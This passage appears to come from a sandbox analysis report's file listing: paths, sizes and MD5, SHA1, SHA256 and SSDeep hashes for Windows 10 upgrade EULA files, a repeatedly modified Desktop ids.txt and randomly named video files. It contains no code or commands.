SHA256: beb1589206e39d6a561a2a8e6aabbc01dd8cd76bd61f62f2e1547b3ddb7e2765
SSDeep: 3072:lXIxUwUHvZ/5f4DWa5EdUtv/5wv0yox8/PU/JTZWCLDT+WpASgxlaL+VFFbbxIDy:lXIvUPZ/cWa5EUtjcPoLL+igA+jdH+M
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm 82.12 KB MD5: fc86de97b9e7df2bcbb58e1c99c1b853
SHA1: 38814abd86380cea0ad61602c5587a4f19f34c14
SHA256: 27f73ecc4a8b326006708a9a784774beb2a3d616ac88099b872fd0507845d1e9
SSDeep: 1536:fUpUdXBwJThDbRzX7lJzUL0WtSwc/5g+ZqGu7OXNte1PpP3R9FTCx31aEiXC:fUpYBKhVX7kL0Wtp25g+A37OdsPm3eC
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm 64.41 KB MD5: 9191b971d4689842cb4d89019afa8068
SHA1: 3882742b21bd260c7e90d61c96174ae32ead9c9e
SHA256: f6f84b09b61d5d54e75a916beda1445e0cc2586bf09565d3c8c697c8896982d1
SSDeep: 1536:5CmspWVsxzCITFe8lTkBaV/vUJ04i13WEWU8AOY9RdHD4GI4Z0D:56MVs9CIYWkoV/824iJWlY9RtDfGD
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm 234.59 KB MD5: 2b197e75d6746a2194772f9295d097fc
SHA1: f026a4bccbc11a97c780c72cdf400e5588f385d9
SHA256: ca0dc3c7b1b85b898b042f66703d17bf146ba66b1eaa4a6e90dbe9a8684708cc
SSDeep: 6144:1uRHxaAiyXChFF4RzrmanyJi+vuJ4UuTj4:1uRRvm4hqamGJJuH4
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm 57.94 KB MD5: 546a61666dadcea933df2b2b15d4d9ca
SHA1: 02d310fb090ba03852fc719cc86e059b2674009e
SHA256: ac61971e29a5e7a8c4fd696c66d87630caad545905c119ed133bc27cfd252879
SSDeep: 1536:qtxIJFKABKdfsKBqbkSowc1OLqJJujJf+cJSZO9BYkgqx:qtxHAgDSe1OLqJwj9Ffnh
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm 68.94 KB MD5: 4c29331813706b6a610900c61e02a955
SHA1: 7b53833fec29b5e534dc8a972929e621cf2a2c02
SHA256: 3851f722506c8776f0b662a332c5dcc7b0c53965537b8deb4c31cf4d6668ad5a
SSDeep: 1536:YSPU5WgkeO84/jSW1RNlQgan7S21gGcQMe3s66blvrxg2/:YS8EgqDVQ7p1aQM7FTx/
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm 64.11 KB MD5: 4ebcd837462910a0f18b51bcf3b28732
SHA1: d81e6f83bf1287b64171b2b6b56957f498e6df36
SHA256: c56994c58d098acdb28e50a9c55fe27598a43312885a0aa1c3161e5925cb2bdb
SSDeep: 1536:Z/3pIQ7u4EwD7qHwWz695NPkvbOYhRwjujaeXYR11hTO:Z/5IQ8wDNe695NczLfdrof1h6
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm 619.98 KB MD5: fd442eb55ade90a0acd187565653fec7
SHA1: e9e3fb12e6179acd054895586e6e29526a694891
SHA256: 0521ea9b4d319d9b0511221c28a8908afe70b59df4418fe523da71e0273b6099
SSDeep: 12288:Ajd5ct7BmW6XfpFbRRX6E8jcGj8vWAqJF3jl+/ud0VqLGejoos5Z6:JzmWWBzdrG4vWAqLx+mUXZ6
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm 75.06 KB MD5: d293af0c2a77214cc77d94863cba6107
SHA1: e367755def8752c279c06fb07f85e4ad9a07220b
SHA256: 6eef81f9be81a00baf5fbeed3c7fc8172c4151d8e449f2da25576301f7a609a4
SSDeep: 1536:WOAZIo4i2031Bu6bcEVeNrEIFcwwKvKNY8rWGjVjzqf7bWYLkNMqReTKh+cB:WnhFs6bckeNrbcJKLG9U7bWYLkNMceGX
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm 66.41 KB MD5: 5a09d1cf3ec4903448b6f41594d752d5
SHA1: 73ae04fbd5f3ae7561508fff4c5d154172fe6370
SHA256: 370824cde1537c33b8a8a7abb60436c826624cd4b2a7e911729c281cb38ec218
SSDeep: 1536:uQX45K0F/HBbe2ORpdz9D+p1/7ad7ysXpomLa3ZUTxL:nX4MIq2eQ747ysX2mYZUTZ
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm 67.45 KB MD5: 695e95355182d8a92c14052c697fc6be
SHA1: 922a62f5b1a0c950dad1542b0792776ee8201985
SHA256: d5fa67abcd5ec0fa136d7f83f6e7d00ed9d963f34658a4ee5308084d36ed98e5
SSDeep: 1536:IzF4eTKBiZINgkM/1iYHfHjjZaVzqnfUbO6TK/o/kl6+:64YuN1M/1iEDlaVzOfUbO6Eo/kI+
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm 77.09 KB MD5: 8830357926760c4305c1cbce576ce38b
SHA1: 36379ffbcba006a6e017106e3f17dec41c49b652
SHA256: f2cae076566e6b309e9c5000014179457e733895384c02100d96c6a4e5f6f368
SSDeep: 1536:mlXT5RLZ6VG4stRmnynGqsMgKHtt9+Qh1JP03p2E/cGcPAzYD4P:KXvZ6VG4stRJnGqfHtt9jG3po1Dg
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm 277.95 KB MD5: 42daac92a6ba6926f632dce9c9eb6442
SHA1: 59d66fea6f72440df600aa0f633752b95e8e6f2f
SHA256: 5167b5ab54159e61df7796537c1ce9e8df41d8f4796e1155f4e641a432041ad3
SSDeep: 6144:EjDyGwWxcABgOJ7/wdCkPuvqFEnGED0I8mnwU7QLPxS:+DyRYcUnJ7/w4UhEnBII8E7QlS
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm 80.80 KB MD5: 3ff0993a2c9fd710ec5a487572f43c94
SHA1: dad6cb6abb0e02158078512522ec0ed57339878f
SHA256: cdc04a621e63b893c83546a4b8f52607729cf2dd411f83b1da355b476a244643
SSDeep: 1536:xYNF2HwbXce4f07RZOlwcnKkSUSxDZbTTAHmGiJy8yBdTjp1p1:xYNcHoseECRklC+IhkHmG6yBBtj1
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm 65.36 KB MD5: e55fcc4667093d720cd544bf357f547e
SHA1: 074442457d149c8ff159d5591cacfcfbb48b9628
SHA256: 131d62ec1806ead06392cd482b7a9ed742898ab4356446ad76b6d9d12db5d754
SSDeep: 1536:OD1RUBn+qCmfyynClyRZqtezvX2iOV8xfp/5zmO3ACw:BBn+qCmfyyClSZ5zvX2iOixfpBwCw
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm 74.53 KB MD5: 10b5b7969a84c98e23b755b4ac802ac9
SHA1: 0e7550283bcdd2f5183c9c2b982c8f107c98ae04
SHA256: 339a78f79a125e040ef10fcd54613686998e4a358e4b8c78c618914c552ec212
SSDeep: 1536:kOxgl24BdJOM1rckERTzN5CwUiO0S0AZEc+nIhhk81NPY7F0:kK3EFrgTZAZ0DAGlIhD1Ny0
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm 69.50 KB MD5: 61da5304dc10d80e5e4879decb7e0835
SHA1: 539f81fcd76983b753b4f90c2d1132f5cc373719
SHA256: 2d8c30b9fd242f7fe2c4ac0b3374efd5c63f6ef0592274297ccc0b954ec5d58d
SSDeep: 1536:Ok3ii/rKlqkbOAwXd+IIhnCqoWuGrOupkYtYdMX3gQPekMYIhcb1U:x3iGkSAsoI2nCqVuknrBX3FvIr
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm 74.14 KB MD5: b5927b08173f3244a452257a4a4b78ec
SHA1: 75274cd497dbd26e792bf558678dc96dd5a6b6ff
SHA256: 16d26f67f37a96aa6641a9e6ad1a6d059c0bfb8921e73b7bba0f3849b03031e3
SSDeep: 1536:goeBmCIqy79HGiw8XjZCyBjZjK71DDoPCGdn+M0JOK8uwDAw5unUlT2:YIPHGitDjtK75DGzDruUl6
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm 261.23 KB MD5: 8cf1e85cbe9b36d02f12e73883980ed3
SHA1: 55d89c21e4782db7823730cae9d95fea4c2af6d2
SHA256: b7f3d4815ec75fdab5789f14b7fdf38a50064d95d754812d4e68bbdd94fee6d8
SSDeep: 6144:e8hYB44LJORoJXzl3/kpV+WEj3L9NBH5Zbl5xyF5lplx:eSYWSJ8oJXzl3/kpuNjH5Zbl5K
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm 124.05 KB MD5: d1ebafabbd6a5a90e34d574b72c899b3
SHA1: b9a6811b559eb0e3aeaa984efb4cc33284b2caa9
SHA256: 72cc909f4e6f71847b3d2b8808ad682330ff5b9fdf6d5613474767a3b5a49b09
SSDeep: 3072:6eOaoyQiTe3qdCxPS05gmgJMOzvXnqaDGx:6epHQLxakgmgZzvXqp
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm 144.45 KB MD5: 156a5319d08eab38cd04add78460e732
SHA1: d64d2444844388beea34623b55ec716f4a77228a
SHA256: bde2e9280fae2127d7f199edb1757d3565218a045f90ae5118540534d5d4f022
SSDeep: 3072:bHWjs3tLEh+GsOnjDRpTKKyGg6pdNNvT51ytgKqkJXBhVSb2MnJBG5ZsztR/1TN:jGOtQhrTWGgOvNoZqMb0bBJMZsJx
False
C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml 92.44 KB MD5: 3f12a3ca0571768b80996a1d3a81dec4
SHA1: 887d06506e3654ad0bb93f28944ddc30a98bbc88
SHA256: f20da7b922f2c27d480863afc99c2f7bf294201158660b36f85525462ea7ce9e
SSDeep: 1536:yxNZbm2/RWrOWBufVXCLR47TgJawJgry8Y4K0BY61m1R88PAD6TJl7HGkZgWMDY3:yVmQRdZkMgaw+ry828Y/v8VwJ9GFLDY3
False
C:\Windows10Upgrade\resources\amd64\hwcompat.txt 72.17 KB MD5: 9a95f8e54676739fedfc6bd2d5feef8c
SHA1: 032a972a2bfe0c5ef483f5c613355014d6e2b85d
SHA256: 8497930c91efe672a59d10a644e75edd41cafa680689fc28add49b864447d7eb
SSDeep: 1536:wsb3n0gitIN+MN8TtRlwahw3hUQrnvvI5UFQzPPbq0+Rs/wB6Bc/:wsb3nVihMN8TtRLhw3hUUvvgUUnbqWwX
False
C:\Windows10Upgrade\resources\amd64\hwexclude.txt 3.02 KB MD5: 25cbc44fe6165781e0ebe73e9832886e
SHA1: 1fc6bd7617aa7dc362e5ab6c86b74080f52482ce
SHA256: d64848bf4b7db9dc698a88eff59dff92213e7d0ac936613d84b5708722210d25
SSDeep: 48:af3z8+5EZx1dUgRD0pCMBw5yMR7jMmBgIc4tpfPpktjp4PslJDTxRr1kO+6zo:afjNAB7x00JR7jMm6Icgktj6P6l1kOT8
False
C:\Windows10Upgrade\resources\amd64\nxquery.cat 10.44 KB MD5: 0aada64e1950c4ea2235f5235e91ecae
SHA1: 6727cde8146f479d66fe30d5ad8b09401347be8b
SHA256: cfd8980f79d81f01c8e2f8f1a9c6bb1734264a1732f3838d618fe7e93702d7d2
SSDeep: 192:ipoFqMhLbm2l3UJKol/p8IinHa+pw5Rkj2UQp2xdKogZh8:iOIaLbd20opp8Jnnw5ij2i7KM
False
C:\Windows10Upgrade\resources\amd64\nxquery.inf 2.22 KB MD5: d4e8f344f117b1f624fe3574788040ea
SHA1: 46a5f3d34f2af75952e8a3585536428a6d49087e
SHA256: 2d49bd18bc90147ced335fffd7e44460768207690b57141cc4f36763f690bc07
SSDeep: 48:WpPIITMKHw9RN8lK0nIyknG/99b6twJfqaOwCiRr1kO+6zo:WpPNMKH8O8Kp6vaOzq1kOT8
False
C:\Users\FD1HVy\Desktop\ids.txt 1.16 KB MD5: 389644b0ad5e00d85b9dd4ec8f1e6716
SHA1: b8a078f3de956bf1f5a9e5290ce4519e2a82adfd
SHA256: 143d1c719e0891e11f4a726e3b975f101fb8c3cc074ba983a58fd82010668405
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyU5:XVWv1rQ2u5aRMtc77Dxv
False
C:\Users\FD1HVy\Desktop\ids.txt 1.20 KB MD5: 35416ac7b3847bf0a2d23e45f0a0fe0d
SHA1: 0b749b33f4ce017f2ef02187745c607462944b50
SHA256: 42bbca95c3864e7880d9c9db620da784fb19ff41b88268f6ae45a3136318f31e
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyUpTC:XVWv1rQ2u5aRMtc77Dxa
False
C:\Users\Public\Libraries\RecordedTV.library-ms 1.69 KB MD5: a0e1c73f8bb341dc916c27b648134a0b
SHA1: 3b3cc673a04b37cfcb86d7664e2a615e515117b0
SHA256: 2d4e3eaf84db69239f58e5bf6a6ab889e50d76407b0ef7e0fb532636f7b5cabb
SSDeep: 48:E1q2Fyy4zGehEV8LUexT+pElsxv8rRr1kO+6zo:Zy4i8FxsgsWp1kOT8
False
C:\Users\FD1HVy\Desktop\ids.txt 1.25 KB MD5: dea797b6267c54c480de780ea1e6a71b
SHA1: 0a6f39deec202a373ee5d50e5167cd771344ff66
SHA256: 0b77f8f36282f704d03aeaedf296f1f4243d58e719e927325ee2d1f53133ffe0
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyUpTUYdeS:XVWv1rQ2u5aRMtc77DxyS
False
C:\Users\FD1HVy\Desktop\ids.txt 1.31 KB MD5: 6caa6cd6fa2827a34d2bd262103623f2
SHA1: 59c8b206eeea1892b03aa16dbc67d172d025c667
SHA256: c7d7513c26c352d499a6776627c3154f69744ac02f4c5aef1cf2a963048419e1
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyUpTUYdekYdF:XVWv1rQ2u5aRMtc77DxyJ
False
C:\Users\FD1HVy\Desktop\ids.txt 1.36 KB MD5: 2e8525d57b66eafb1d47bde3dc12d79f
SHA1: 11a7f6832df6654511928ae5e3a90331b3f5238c
SHA256: b96806f87a435164afa58bdf6c1bbc4b8fd25d80a0ccf4fef829fe0aae571013
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyUpTUYdekYdpYdE:XVWv1rQ2u5aRMtc77Dxy/
False
C:\Users\FD1HVy\Desktop\ids.txt 1.41 KB MD5: b19ffe6d4f199afc2aa8558ac0e22046
SHA1: 7279129c4a28b68a40566fce9a3def2963f7bfd0
SHA256: 0db93e02c801c67b744428ff9d0002376623966b1636f51ac08047ae48a7f8ce
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyUpTUYdekYdpYdaJmn:XVWv1rQ2u5aRMtc77DxyRmn
False
C:\Users\FD1HVy\Desktop\ids.txt 1.45 KB MD5: 0f87457f00f238c3a7cca6f1cbb23ec7
SHA1: a90cb2d2d4d4a3b61e8ee176a0ff689600852c3b
SHA256: 241413b193316edf7a1fcdde6d0751e27415c8b67a1e1d34ce0c7fd0a5bdf22c
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyUpTUYdekYdpYdaJmHh:XVWv1rQ2u5aRMtc77DxyRmB
False
C:\Users\FD1HVy\Desktop\ids.txt 1.50 KB MD5: 9a53212dc333f8a48acb1d033b0f8b4c
SHA1: cd1dae6ec3a5ff4c86b437cd6c62f7747fddbc3a
SHA256: dcae2ba542ead94317361bc2c45374ba48c7ef7ce912e3b5476a34c01c28a1c9
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyUpTUYdekYdpYdaJmHdS:XVWv1rQ2u5aRMtc77DxyRmg
False
C:\Users\FD1HVy\Desktop\ids.txt 1.55 KB MD5: 81d9f5eb9f03606a36158dcf6359a348
SHA1: 993bcb3e33ece6975eb8bff78d580c55ed9a9296
SHA256: c927978e24a229fc8e787f6a10bacd4826cbc39e40f55b859af811dbc67fa3e9
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyUpTUYdekYdpYdaJmHdkT3dY:XVWv1rQ2u5aRMtc77DxyRmI3C
False
C:\Users\FD1HVy\Desktop\ids.txt 1.59 KB MD5: fc404c6c23cc4e1ad614e644f705f5c3
SHA1: 0568eb5978054691ddf9345aed2c6dcaded0e288
SHA256: f70172072e36f4e8bc4b306cf58092a7229808efd1eec5a5739daf56d4de3568
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyUpTUYdekYdpYdaJmHdkT3dW7:XVWv1rQ2u5aRMtc77DxyRmI3C
False
C:\Users\FD1HVy\Desktop\ids.txt 1.69 KB MD5: 8a742caacef0e947537d3df2c20864a1
SHA1: 63d0140bcbaf186448dc762283d5c32f17df9273
SHA256: 2167cb1026cdecfcaa8b2f6437b754e3e766daef8daca04136d7566ffb2f2e56
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyUpTUYdekYdpYdaJmHdkT3dW9G:XVWv1rQ2u5aRMtc77DxyRmI3S6Q8
False
C:\Users\FD1HVy\Desktop\ids.txt 1.82 KB MD5: 8cb9eeedcba07341d29ecd0b89ece279
SHA1: e99bc830ae5bde713671e6c0a366d593354ed0c7
SHA256: de97fc7818eee589ab9aec9ad69bc0b3bbc8724a9fd90b73e4fdb95b801b2724
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyUpTUYdekYdpYdaJmHdkT3dW9y:XVWv1rQ2u5aRMtc77DxyRmI3S6QM66
False
C:\Users\FD1HVy\Desktop\ids.txt 1.96 KB MD5: d54dea08de5ab00cf331b5555a32bf10
SHA1: 2fc7aed89fe1ef8d9a4388131a0639107e70c9ee
SHA256: 7880ad939e240fb5a2f05ae1b74ad2c531f017edccb70d4cad1994eda4262d28
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyUpTUYdekYdpYdaJmHdkT3dW97:XVWv1rQ2u5aRMtc77DxyRmI3S6QM666X
False
C:\Users\FD1HVy\Desktop\ids.txt 2.00 KB MD5: 22a5ca5318d2c66c06857dfce57851aa
SHA1: 34eaea6d6dcabe1cc3d7f11246b677c739fd730f
SHA256: 51f15aa714e55807f98e9bdc1b31f82f094004e507115925a99a014f419134c4
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyUpTUYdekYdpYdaJmHdkT3dW9v:XVWv1rQ2u5aRMtc77DxyRmI3S6QM666b
False
C:\Users\FD1HVy\Desktop\ids.txt 2.04 KB MD5: 51e1d42cf05d4547879edc77df35319f
SHA1: 2b79f6d0dc4869cfa3b074d588cf40d61b3ccf73
SHA256: fd97f497d78f1d5a1b8874ec22b2c8c51a36772a6bbd2c9c9a8aab4da9df82b4
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyUpTUYdekYdpYdaJmHdkT3dW9b:XVWv1rQ2u5aRMtc77DxyRmI3S6QM666X
False
C:\Users\FD1HVy\Desktop\ids.txt 2.08 KB MD5: dcb084eb79d52ba0a98dcb7db7b141ce
SHA1: 20575f8c5da8550108a0561624300e4f2a2e204e
SHA256: aa007a72d38910eafbb01c731df23fabd158a37b5a3b5606776011e4840e4eaa
SSDeep: 48:XVWv1rQ2u5aRMtc77DxyRmI3S6QM666jr:XarQ35aRMtQN0n3S63666/
False
C:\Users\FD1HVy\Desktop\ids.txt 2.13 KB MD5: 60bb06f7282f3b9b56914638a7a49cb8
SHA1: 6c42cdd4dd037e109f6e63c611e99876dcfa6b32
SHA256: 1a70182c06faba2e09c006c0b44c9524634ac04873e4ccf003b4606c80a08c84
SSDeep: 48:XVWv1rQ2u5aRMtc77DxyRmI3S6QM666j7:XarQ35aRMtQN0n3S63666P
False
C:\Users\FD1HVy\Desktop\ids.txt 2.17 KB MD5: 169ca57c1a322fdeb8331a35615fbcd1
SHA1: 20327591be2d50e830bdef470a73ff342370824d
SHA256: 6756024bee331125fce4703df7b05fc9185174d81745c0e8def49d3942769975
SSDeep: 48:XVWv1rQ2u5aRMtc77DxyRmI3S6QM666jB:XarQ35aRMtQN0n3S63666N
False
C:\Users\FD1HVy\Videos\2NnCc4KzPlFvi.swf 2.34 KB MD5: 3f956870f4a63d9e08868d07a7e5eb94
SHA1: d9d27d28bfb1b7bc011a19c6ba6e1d6392275742
SHA256: 0068771ff156e47e1bf97129622ad69b51a08bb9fd65ab728297915d8329cd1a
SSDeep: 48:uQdxGoupi8bPTA6lYbphQRNgbOo3HWoqIsOq4xGA4D9Rr1kO+6zo:+pt1YfogbOcHtqLGT41kOT8
False
C:\Users\FD1HVy\Videos\5K6QHDJbfIWjYG262dir.avi 71.47 KB MD5: 6c161f81eb6c42d37e4335cc1da026ad
SHA1: 4cd22d1a9b3e0b224822d032bd7d42c1153eb53e
SHA256: 8252a67d52f88e72594bc1c5e2a13f33b83676e3bb3de85dd11c05950b390ba5
SSDeep: 1536:j89GiHDv11lUtd3Nfa5cC7LAAblS3cbMqotpoP+SPt8NH7:j0GKT9S3NfLC7LdlS3cQqRt8N7
False
C:\Users\FD1HVy\Videos\ccn85Ai_.mp4 81.08 KB MD5: 2558b188b0cf79b7fbaec2b2ff0b8ada
SHA1: 9691fb675bd47c53fde6ceaa1a146aa54feb283f
SHA256: f3d94f71e3dfe4fe6f7172ae93a29f9333406fc2835441418717e5d8190a710d
SSDeep: 1536:k/595+ogXfsYxSLpHL3Csb33syKj5EnoNso8uBo32QJWeDxhL9if:Y5JJOSLpHLSsb38lq3uvQJWQLQf
False
C:\Users\FD1HVy\Videos\nZxJYVmIXHGhm.flv 26.67 KB MD5: e22bfa3f88c3300864d8fd55ab4eff06
SHA1: 9c960f94c3c7709e9df3672bb96a63822c49982d
SHA256: 5d4096503ba3353d02e58950cf004e55b613e1011c4ea44238aee9d23ee3687c
SSDeep: 768:Lccr7IEPHgWnx0jqf6Ra/AWcqF6m5/GmbQYfm:LvAWJUdqFh/m
False
C:\Users\FD1HVy\Videos\ofQy-RjpJsOl2h.avi 23.06 KB MD5: a1e7b2803f7733acc8d87ae0948eeaa0
SHA1: 349228cc72b58e450a446fd522e6bf2a3aed1288
SHA256: 01ac107db45241afefcdd4cf297c394307d58ab73d474617732c07e623a7523e
SSDeep: 384:A7x0GPr1WnV6Lphe0oQiWTu0U1B2KVlYQrXXV+4p3yQQfboRI:4x0crMEpiD0UuelHXve4I
False
C:\Users\FD1HVy\Videos\s9NfPDdsE6nhezSDza.flv 97.98 KB MD5: 957041e787ca40d253f031b02939f7dc
SHA1: 4517cb872c2bf5bf1f199a0c8377b909820f3a0e
SHA256: ade8c37a49259daf5116e154dc846b6a45c65bd3abd8282af4e41a54ea2598d5
SSDeep: 3072:KurE046v+XzmAQAz3xjMDK3C2AZeumY9VQ2tv:/rE0B26i9gK3XQe4ltv
False
C:\Users\FD1HVy\Videos\XZJL mjrH9\b70zp1nV4_RX.flv 57.25 KB MD5: 4f8eba35db270219ce90a22b0693742c
SHA1: 336134dfef86ce9b6baa82b6e225acf936759646
SHA256: 578d80010daceab9b82e3a846ac4250fbb90227b973b86ec38a01940f6feb384
SSDeep: 1536:LEluA1rhtdZJvn8Sz00XjXWnH/VXdrvqhdM22r3OHR1TRx4+14blX0:LUumZJ9AujURdG4hrMDETblX0
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\9v2jkjY15yj.mp4 61.50 KB MD5: 3cdf40ccf8b5c5a2169bf114ef38d8de
SHA1: 094f5de6e45411e30a8e1d490ae6ed30e35c1fe5
SHA256: 518966e9eae60909919774ed52ab21cec3de11713b2237c37cbefb4c04739af4
SSDeep: 1536:Aim1ISd4xPJQ2XopIKTt+6rmTN9s4Y7IYs3ziI:BSyxK2XouKRr0N9s4Y7Vid
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\Aksfbq.flv 38.06 KB MD5: 4fc9abd12b0f77fe283f55bce2e91cdf
SHA1: a71c218cef61e6ab3b57cbc25cf1bf273acd4c24
SHA256: 4c1b603e2f7fb639db6c10cb84418fb6892ae863a20048f8ca295dc4a46e15cc
SSDeep: 768:ZAQ4u6C3URyCupwVWbj6ejsgVj55cXDdTZPwsVuz0Pkzm/cbEuaE1Ml80M6beo:GJu65MBwVuTjz5ejwsVuzmk6/4EX
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\CokPtPcir1Km9h.swf 91.94 KB MD5: 4788670db952001a00cbaa4e4a9b8236
SHA1: c5a6034acc0431f452571b2ccef9c76b254f836d
SHA256: 9cf9964b8f5c3418c79f6d7aeb93af2e589ad0b7ab1cc08ced8accc6b0720a6c
SSDeep: 1536:gHAmrDvXig6LBmUB7mzaHkvf2VcbZORzwHiWPjgnQd1ppclr2MZlFltt4beFQI5S:gwLByaEH2+mwT0waCMxlttgi0
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\FFQYJepVdSMrceUSp.flv 92.08 KB MD5: ab5034613d59675588314a76d6ee7f07
SHA1: 46e3efc6ad60e968bee136944d0057fd4ddbcbff
SHA256: d1522dba72740296e662136eb2c4a50a697a269486184c2a7dd8695ab208b6a2
SSDeep: 1536:D8nMUbA8TcdQ/E5raz+hhboLUhJobhYNT/71o0oYmqJS/RJP+B+d0Lgr:D8Mvs3E5+e5cUheaponNPM+/
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\JKXNIWeQxs8Bq.swf 12.12 KB MD5: a4491104e9317aaf8eaddcc4747e2274
SHA1: 264ccdf5e76483bd9308de7891e94c1be780ce84
SHA256: 302e4cfc318dc3756c85a4c2826bb69b870ca908564c2f7510ade36931fe1f0d
SSDeep: 192:/C+cgjE48GuiqRBBE+nS8SUYP6M/6duyg+3OGzh8:/CFp4895wr9/Cuyg+9S
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\NfDZ9FmKUznX7QjqQB0.flv 75.56 KB MD5: bbf1d3613cbe8d46efa81170b0a31b4d
SHA1: 5925b3102315a56d4cf3d302d6d5ee46285fa797
SHA256: a1c3d915400ad738d2b919d51f7542bd17153c9f40da6adb3dc3d8ba716da3ae
SSDeep: 1536:ZGf6uXSPGy3mTVCxFx5hn5gVmZIUeCJABzQzjnl08a/QYGMfuA42Xz5N:ZGfBdy3mTVQFx/n5g0PeCedQ1ra/DJum
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\OKe9Vwu AXHg.avi 3.31 KB MD5: 9068404ec2d02e85b2922d2a2d492d5a
SHA1: d45e540f12593e7616d00ba544091a9b4d082da5
SHA256: 7b193a55d0dbc114ef94ce49091d4417f9ae01a5fb4cad5f1e6b0bc73794017a
SSDeep: 96:2lL6L3TWoo+LVVEmnfdbfaHPE0/m1kOT8:2lqjDV6E0Sh8
False
C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\Ox_K.flv 57.39 KB MD5: 4094d92d2ac42d92a1a78c55c5640af0
SHA1: d1edb3f1d8c927a35a951acf00b4abbfe69426d1
SHA256: 0c48032179b34a98cf424e7596377dbb9c274b054a15bc307ba9f27d245601fe
SSDeep: 1536:FfFz5wO+bf3ywufnUS7+Vb2ttTfXZJ7F7QZYqndMimaCkQ:FfFzv+bfVuM5KttThJ7FUNndMimaCkQ
False
C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\flFRhosiB.flv 42.92 KB MD5: 109e514ed39a1c46b8ab766f601bc085
SHA1: 5ee41ad6f00cd38158f62246458fd49fbcc45dc6
SHA256: 3d62669c8654026cbf93ddfe30bddc9b63b41725086ca849b51c6a00527b417c
SSDeep: 768:uBGfI8/+zGOQIe/Q1zlUkHH+0Rs0uFjiDork5AcgzbFlX+IySy9Fyb/KZz3//b77:q8XOQ//ABUknFRqt4f4lXMR5UI
False
C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\LRb2X8JvR7dXd5G2QS.avi 41.47 KB MD5: 594834d54db4534ac0369b1a9c709af8
SHA1: daf0df19d05fd8ed1bad567c8b01a38fbc232e4a
SHA256: 1db80ddcbcadd575af1aeee6a8acbabcee7e1acd481b1adb8aaa94b2e115f6e2
SSDeep: 768:9nAwZo9r7yOg+AhCQyoo3GFu/6PyHWIS1xETsSlOT4bZCCbbQFFa7Lzm43s/iN3:9nAwe5l/Joor/4IS1ms2OTiZts61
False
C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\MOuupnQy6t5YPt.avi 27.14 KB MD5: 26466248d68d08cc3231304a20259eea
SHA1: b9851fd723e7c426ec23ca7e8f91cd59131bc241
SHA256: 0bca2f73ac058dceecee9425cb798007f883e456374cc7986e5421a1fc79d740
SSDeep: 384:0vr5dD69411OuqtjT87VWPTxJzYnO+dN0yU8AqDXPrVVgF72UCXbWbl20v1bUIV2:KVK41suqtjJPFGOE0ITJVSobWJ2K4IV2
False
C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\xBzkCKlaqOVT0MjkjP6.mp4 36.62 KB MD5: d006009bd84ef8d956fb19594aa21eee
SHA1: f706741c9487d6471ce47e6283fc357aacbe7200
SHA256: fbf40af1e6fb12d4b1b5d3df22c3b846f4229e5f6158246a2e12a09b0ae80d8e
SSDeep: 768:3f/cCbHNU4Tx2iunGjhN1P2uXTIMKCDMqB+rdKUBP5niokp2ci47HR:8IHe4Tx5FjIgkFtrdJBgouia
False
C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\82zMDESjlfgM7otH 3.avi 52.03 KB MD5: cc3eaaa4452808c28771ce5160a59a5a
SHA1: a52a88d5e8aa2db1761fee55920c77ad22c26f1e
